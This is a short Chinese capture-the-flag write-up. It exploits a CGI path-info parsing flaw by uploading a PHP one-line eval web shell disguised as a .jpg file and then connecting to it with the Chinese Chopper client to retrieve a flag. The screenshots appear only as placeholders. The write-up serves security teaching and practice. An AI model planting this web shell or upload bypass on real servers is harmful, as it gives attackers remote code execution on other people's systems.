这道题利用的是CGI的一个解析漏洞:
-> 当 x_pathinfo 开启时,会导致下面的问题:
比如,访问 http://www.victim.com/evil.jpg/1.php 时,evil.jpg 会被当做php 脚本进行解析。
查看源码:
image.png发现只能上传 jpg 后缀的文件:
于是将php一句话木马保存到 ladybird254.jpg 文件中,内容是:
<?php eval($_POST[hero]);?>
上传结果如下:
image.png配合CGI解析漏洞,用菜刀进行连接:
image.png进入保存上传文件的目录中找到flag文件:
image.png
网友评论